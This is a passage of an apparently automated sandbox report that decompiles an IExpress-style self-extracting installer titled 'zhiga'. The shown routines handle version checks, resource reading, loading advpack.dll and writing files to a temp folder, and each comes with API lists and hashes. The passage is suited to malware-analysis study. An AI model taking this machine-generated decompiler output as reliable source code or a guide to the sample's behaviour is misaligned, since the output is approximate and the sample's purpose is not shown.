                                                                        										}
                                                                        										__eflags = _t138 - 0x54c;
                                                                        										if(_t138 == 0x54c) {
                                                                        											goto L30;
                                                                        										}
                                                                        										__eflags = _t138;
                                                                        										if(_t138 == 0) {
                                                                        											goto L66;
                                                                        										}
                                                                        										_t135 = 0;
                                                                        										__eflags = 0;
                                                                        										goto L44;
                                                                        									}
                                                                        									L37:
                                                                        									_t129 = _v432;
                                                                        									__eflags = _t129[0x7c];
                                                                        									if(_t129[0x7c] == 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t133 =  &_v268;
                                                                        									_t104 = E00A328E8(_t129,  &_v268, _t129,  &_v428);
                                                                        									__eflags = _t104;
                                                                        									if(_t104 != 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t135 = _v428;
                                                                        									_t133 = 0x54d;
                                                                        									_t138 = 0x54d;
                                                                        									goto L40;
                                                                        								}
                                                                        								goto L33;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							if(_t91 > 0) {
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _t123;
                                                                        							if(_t123 != 0) {
                                                                        								__eflags = _t91;
                                                                        								if(_t91 != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                        								L27:
                                                                        								if(__eflags <= 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								L28:
                                                                        								__eflags = _t135;
                                                                        								if(_t135 == 0) {
                                                                        									goto L33;
                                                                        								}
                                                                        								_t138 = 0x54c;
                                                                        								goto L30;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							_t107 = _v416.dwBuildNumber;
                                                                        							if(_t91 != 0) {
                                                                        								_t131 = _v424;
                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                        									goto L37;
                                                                        								}
                                                                        								goto L28;
                                                                        							}
                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                        							_t109 = _v424;
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                        								goto L28;
                                                                        							}
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                        							goto L27;
                                                                        							L33:
                                                                        							_t135 =  &(_t135[1]);
                                                                        							_v428 = _t135;
                                                                        							_v420 = _t135;
                                                                        							__eflags = _t135 - 2;
                                                                        						} while (_t135 < 2);
                                                                        						goto L36;
                                                                        					}
                                                                        					__eflags = _t77 == 1;
                                                                        					if(_t77 == 1) {
                                                                        						 *0xa39a40 = _t119;
                                                                        						 *0xa38184 = 1;
                                                                        						 *0xa38180 = 1;
                                                                        						__eflags = _t133 - 3;
                                                                        						if(_t133 > 3) {
                                                                        							__eflags = _t133 - 5;
                                                                        							if(_t133 < 5) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t113 = 3;
                                                                        							_t119 = _t113;
                                                                        							goto L13;
                                                                        						}
                                                                        						_t119 = 1;
                                                                        						_t114 = 3;
                                                                        						 *0xa39a40 = 1;
                                                                        						__eflags = _t133 - _t114;
                                                                        						if(__eflags < 0) {
                                                                        							L9:
                                                                        							 *0xa38184 = _t135;
                                                                        							 *0xa38180 = _t135;
                                                                        							goto L14;
                                                                        						}
                                                                        						if(__eflags != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                        							goto L14;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					_t138 = 0x4ca;
                                                                        					goto L44;
                                                                        				} else {
                                                                        					_t138 = 0x4b4;
                                                                        					L44:
                                                                        					_push(_t135);
                                                                        					_push(0x10);
                                                                        					_push(_t135);
                                                                        					_push(_t135);
                                                                        					L65:
                                                                        					_t133 = _t138;
                                                                        					E00A344B9(0, _t138);
                                                                        					L66:
                                                                        					return E00A36CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                        				}
                                                                        			}






































                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A33723
                                                                        • MessageBeep.USER32(00000000), ref: 00A339C3
                                                                        • MessageBoxA.USER32(00000000,00000000,zhiga,00000030), ref: 00A339F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Message$BeepVersion
                                                                        • String ID: 3$zhiga
                                                                        • API String ID: 2519184315-2183486482
                                                                        • Opcode ID: 829d40137bb1fc5534882299f31e338badf55c22203f852c036142d259d4cd53
                                                                        • Instruction ID: 22bcec59d7ccd00eaf3f9d6d5ea68f6caade5d32632fc74dfdae7d15e3cd87e4
                                                                        • Opcode Fuzzy Hash: 829d40137bb1fc5534882299f31e338badf55c22203f852c036142d259d4cd53
                                                                        • Instruction Fuzzy Hash: 04911272E092249FEF34CB25CD91BAAB7B0AF45340F1541A9F889EB251DB718F81CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00A36495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				signed int _t9;
                                                                        				signed char _t14;
                                                                        				struct HINSTANCE__* _t15;
                                                                        				void* _t18;
                                                                        				CHAR* _t26;
                                                                        				void* _t27;
                                                                        				signed int _t28;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t18 = __ebx;
                                                                        				_t9 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t9 ^ _t28;
                                                                        				_push(__ecx);
                                                                        				E00A31781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        				_t26 = "advpack.dll";
                                                                        				E00A3658A( &_v268, 0x104, _t26);
                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                        					_t15 = LoadLibraryA(_t26);
                                                                        				} else {
                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                        				}
                                                                        				return E00A36CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                        			}


                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A364DF
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A364F9
                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A36502
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$AttributesFile
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                        • API String ID: 438848745-726598030
                                                                        • Opcode ID: e7ae2a6dccf75341262448d64a9903ac7ad3e7e1a9cb4744b9722357e2fee70a
                                                                        • Instruction ID: c5dc7c6c87150e8f5e6849cc72b37b3bb7fea438c850c1764bca6bd985832f34
                                                                        • Opcode Fuzzy Hash: e7ae2a6dccf75341262448d64a9903ac7ad3e7e1a9cb4744b9722357e2fee70a
                                                                        • Instruction Fuzzy Hash: CC01F470A00108BBDB54DBA4DC49EEEB778EB61311F5002A9F5C5921D0DFB09E8ACA51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A328E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				int _v28;
                                                                        				int _v32;
                                                                        				void* _v36;
                                                                        				int _v40;
                                                                        				void* _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				long _t68;
                                                                        				void* _t70;
                                                                        				void* _t73;
                                                                        				void* _t79;
                                                                        				void* _t83;
                                                                        				void* _t87;
                                                                        				void* _t88;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t99;
                                                                        				int _t101;
                                                                        				void* _t103;
                                                                        				void* _t106;
                                                                        				void* _t109;
                                                                        				void* _t110;
                                                                        
                                                                        				_v12 = __edx;
                                                                        				_t99 = __ecx;
                                                                        				_t106 = 0;
                                                                        				_v16 = __ecx;
                                                                        				_t87 = 0;
                                                                        				_t103 = 0;
                                                                        				_v20 = 0;
                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                        					L19:
                                                                        					_t106 = 1;
                                                                        				} else {
                                                                        					_t62 = 0;
                                                                        					_v8 = 0;
                                                                        					while(1) {
                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                        						if(E00A32773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                        						_v28 = _t68;
                                                                        						if(_t68 == 0) {
                                                                        							_t99 = _v16;
                                                                        							_t70 = _v8 + _t99;
                                                                        							_t93 = _v24;
                                                                        							_t87 = _v20;
                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                        								goto L18;
                                                                        							}
                                                                        						} else {
                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                        							if(_t103 != 0) {
                                                                        								_t73 = GlobalLock(_t103);
                                                                        								_v36 = _t73;
                                                                        								if(_t73 != 0) {
                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                        										L15:
                                                                        										GlobalUnlock(_t103);
                                                                        										_t99 = _v16;
                                                                        										L18:
                                                                        										_t87 = _t87 + 1;
                                                                        										_t62 = _v8 + 0x3c;
                                                                        										_v20 = _t87;
                                                                        										_v8 = _v8 + 0x3c;
                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                        											continue;
                                                                        										} else {
                                                                        											goto L19;
                                                                        										}
                                                                        									} else {
                                                                        										_t79 = _v44;
                                                                        										_t88 = _t106;
                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                        										_t101 = _v28;
                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                        										_t97 = _v48;
                                                                        										_v36 = _t83;
                                                                        										_t109 = _t83;
                                                                        										do {
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A32A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A32A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                        											_t109 = _t109 + 0x18;
                                                                        											_t88 = _t88 + 4;
                                                                        										} while (_t88 < 8);
                                                                        										_t87 = _v20;
                                                                        										_t106 = 0;
                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                        												GlobalUnlock(_t103);
                                                                        											} else {
                                                                        												goto L15;
                                                                        											}
                                                                        										} else {
                                                                        											goto L15;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        				}
                                                                        				L20:
                                                                        				 *_a8 = _t87;
                                                                        				if(_t103 != 0) {
                                                                        					GlobalFree(_t103);
                                                                        				}
                                                                        				return _t106;
                                                                        			}


                                                                        APIs
                                                                        • GlobalFree.KERNEL32 ref: 00A32A6F
                                                                          • Part of subcall function 00A32773: CharUpperA.USER32(B6B6972C,00000000,00000000,00000000), ref: 00A327A8
                                                                          • Part of subcall function 00A32773: CharNextA.USER32(0000054D), ref: 00A327B5
                                                                          • Part of subcall function 00A32773: CharNextA.USER32(00000000), ref: 00A327BC
                                                                          • Part of subcall function 00A32773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32829
                                                                          • Part of subcall function 00A32773: RegQueryValueExA.ADVAPI32(?,00A31140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32852
                                                                          • Part of subcall function 00A32773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32870
                                                                          • Part of subcall function 00A32773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A328A0
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A33938,?,?,?,?,-00000005), ref: 00A32958
                                                                        • GlobalLock.KERNEL32 ref: 00A32969
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A33938,?,?,?,?,-00000005,?), ref: 00A32A21
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A32A81
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                        • String ID:
                                                                        • API String ID: 3949799724-0
                                                                        • Opcode ID: 06fe922ef1f525ef540a08a3059daac772533c012e7d063f5f3f5cc6e3f36a4c
                                                                        • Instruction ID: dfb38c5f279c101ee447db892a36adbac6d5faedf54521f0a23d5d771ecc4651
                                                                        • Opcode Fuzzy Hash: 06fe922ef1f525ef540a08a3059daac772533c012e7d063f5f3f5cc6e3f36a4c
                                                                        • Instruction Fuzzy Hash: F5512831E00219EBCB25CF98DD84AAEBBB9FF48740F14402AF945E3221DB319941DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 32%
                                                                        			E00A34169(void* __eflags) {
                                                                        				int _t18;
                                                                        				void* _t21;
                                                                        
                                                                        				_t20 = E00A3468F("FINISHMSG", 0, 0);
                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                        				if(_t21 != 0) {
                                                                        					if(E00A3468F("FINISHMSG", _t21, _t20) != 0) {
                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                        							L7:
                                                                        							return LocalFree(_t21);
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0x40);
                                                                        						_push(0);
                                                                        						_push(_t21);
                                                                        						_t18 = 0x3e9;
                                                                        						L6:
                                                                        						E00A344B9(0, _t18);
                                                                        						goto L7;
                                                                        					}
                                                                        					_push(0);
                                                                        					_push(0x10);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t18 = 0x4b1;
                                                                        					goto L6;
                                                                        				}
                                                                        				return E00A344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A330B4), ref: 00A34189
                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A330B4), ref: 00A341E7
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$FINISHMSG
                                                                        • API String ID: 3507850446-3091758298
                                                                        • Opcode ID: b9499f3465dbe69cbd961561d3e3c2868cc7926eff187161f1a536ea23c88be4
                                                                        • Instruction ID: 05400f152ba3877477f2a00e0361547e1da3d9f419037614149cf76f2b5be482
                                                                        • Opcode Fuzzy Hash: b9499f3465dbe69cbd961561d3e3c2868cc7926eff187161f1a536ea23c88be4
                                                                        • Instruction Fuzzy Hash: 1501FFB1300B243BF3282BA54C86F7B618EDBE9795F004235B746E21809AA8EC4241B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00A319E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v520;
                                                                        				void* __esi;
                                                                        				signed int _t11;
                                                                        				void* _t14;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				void* _t33;
                                                                        				struct HWND__* _t34;
                                                                        				signed int _t35;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t27 = __ebx;
                                                                        				_t11 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t11 ^ _t35;
                                                                        				_t34 = _a4;
                                                                        				_t14 = _a8 - 0x110;
                                                                        				if(_t14 == 0) {
                                                                        					_t32 = GetDesktopWindow();
                                                                        					E00A343D0(_t34, _t15);
                                                                        					_v520 = 0;
                                                                        					LoadStringA( *0xa39a3c, _a16,  &_v520, 0x200);
                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                        					MessageBeep(0xffffffff);
                                                                        					goto L6;
                                                                        				} else {
                                                                        					if(_t14 != 1) {
                                                                        						L4:
                                                                        						_t23 = 0;
                                                                        					} else {
                                                                        						_t32 = _a12;
                                                                        						if(_t32 - 0x83d > 1) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							EndDialog(_t34, _t32);
                                                                        							L6:
                                                                        							_t23 = 1;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                        			}














                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00A31A18
                                                                        • GetDesktopWindow.USER32 ref: 00A31A24
                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00A31A4F
                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A31A62
                                                                        • MessageBeep.USER32(000000FF), ref: 00A31A6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1273765764-0
                                                                        • Opcode ID: 1a1704f1bcb832c251d032adec412fafef0a5ac74eacb1794b675ecb38d713c2
                                                                        • Instruction ID: 835414770f0ab625744bd58557641e6453d61b3e3a34b1b9d161996856858a7f
                                                                        • Opcode Fuzzy Hash: 1a1704f1bcb832c251d032adec412fafef0a5ac74eacb1794b675ecb38d713c2
                                                                        • Instruction Fuzzy Hash: 9A11D631A01219AFDB10EFA4EE08AAE77B8FF59341F108254F952D7190DF349E02DB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E00A363C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				long _v272;
                                                                        				void* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t15;
                                                                        				long _t28;
                                                                        				struct _OVERLAPPED* _t37;
                                                                        				void* _t39;
                                                                        				signed int _t40;
                                                                        
                                                                        				_t15 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t15 ^ _t40;
                                                                        				_v272 = _v272 & 0x00000000;
                                                                        				_push(__ecx);
                                                                        				_v276 = _a16;
                                                                        				_t37 = 1;
                                                                        				E00A31781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        				E00A3658A( &_v268, 0x104, _a12);
                                                                        				_t28 = 0;
                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                        				if(_t39 != 0xffffffff) {
                                                                        					_t28 = _a4;
                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                        						 *0xa39124 = 0x80070052;
                                                                        						_t37 = 0;
                                                                        					}
                                                                        					CloseHandle(_t39);
                                                                        				} else {
                                                                        					 *0xa39124 = 0x80070052;
                                                                        					_t37 = 0;
                                                                        				}
                                                                        				return E00A36CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                        			}
















                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A3642D
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A3645B
                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A3647A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A363EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleWrite
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 1065093856-1955631000
                                                                        • Opcode ID: 25903919ad7d9096d490c1e2779550cf209b55289f319a0c7c75007e7a4a69a9
                                                                        • Instruction ID: 8c970594722c4f2845c2fc72c8e9b241dd9a4cefa3e2bb47b19c4cc86f5ee467
                                                                        • Opcode Fuzzy Hash: 25903919ad7d9096d490c1e2779550cf209b55289f319a0c7c75007e7a4a69a9
                                                                        • Instruction Fuzzy Hash: 1721D271A00218ABDB10DF65DC85FEB737CEB55314F0042A9F595A3280DBB05D858FA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A33680(void* __ecx) {
                                                                        				void* _v8;
                                                                        				struct tagMSG _v36;
                                                                        				int _t8;
                                                                        				struct HWND__* _t16;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t16 = 0;
                                                                        				while(1) {
                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                        					if(_t8 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						do {
                                                                        							if(_v36.message != 0x12) {
                                                                        								DispatchMessageA( &_v36);
                                                                        							} else {
                                                                        								_t16 = 1;
                                                                        							}
                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                        						} while (_t8 != 0);
                                                                        						if(_t16 == 0) {
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t8;
                                                                        			}








                                                                        APIs
                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A3369F
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A336B2
                                                                        • DispatchMessageA.USER32(?), ref: 00A336CB
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A336DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                        • String ID:
                                                                        • API String ID: 2776232527-0
                                                                        • Opcode ID: 675689541d853be78f81a5fc2b613b3d459f80bb08f51d12967aeb22cca5be67
